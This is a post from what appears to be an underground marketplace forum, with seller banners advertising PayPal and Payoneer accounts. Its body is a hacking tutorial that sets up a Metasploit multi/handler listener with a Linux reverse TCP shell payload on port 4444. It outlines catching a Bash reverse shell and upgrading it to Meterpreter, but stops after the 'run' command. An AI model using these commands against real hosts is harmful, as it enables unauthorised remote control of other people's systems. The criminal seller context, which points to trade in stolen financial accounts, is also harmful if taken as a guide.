DarkStash Support and Advertisement Telegram: @DarkStashMaster
Jabber : DarkStash@xmpp.jp




Joker

Verified Seller Topic Selling Paypal, Payoneer,Ban
Verified Seller
Premium User
In this hacking tutorial we are going to upgrade a Netcat shell to a Meterpreter shell in 3 simple steps.

First we will use the multi handler module in Metasploit to intercept the reverse shell using a Linux x86 payload.

Then we will issue the reverse shell on a Linux host with a Bash reverse shell.

Finally we will use the post exploitation Metasploit module shell_to_meterpreter targeting the session with the reverse Bash shell.

Let’s fire up Metasploit and setup the multi handler to intercept a reverse Bash shell on port 4444 with the following command:

msfconsole

Select the multi handler exploit:

use exploit/multi/handler

Now we need to set the details for the listening host (our attack box):

set lhost [listening host IP]
set lport 4444

Specify the following payload to use:

set payload linux/x86/shell/reverse_tcp

And finally run the exploit:

run
 
Back
Top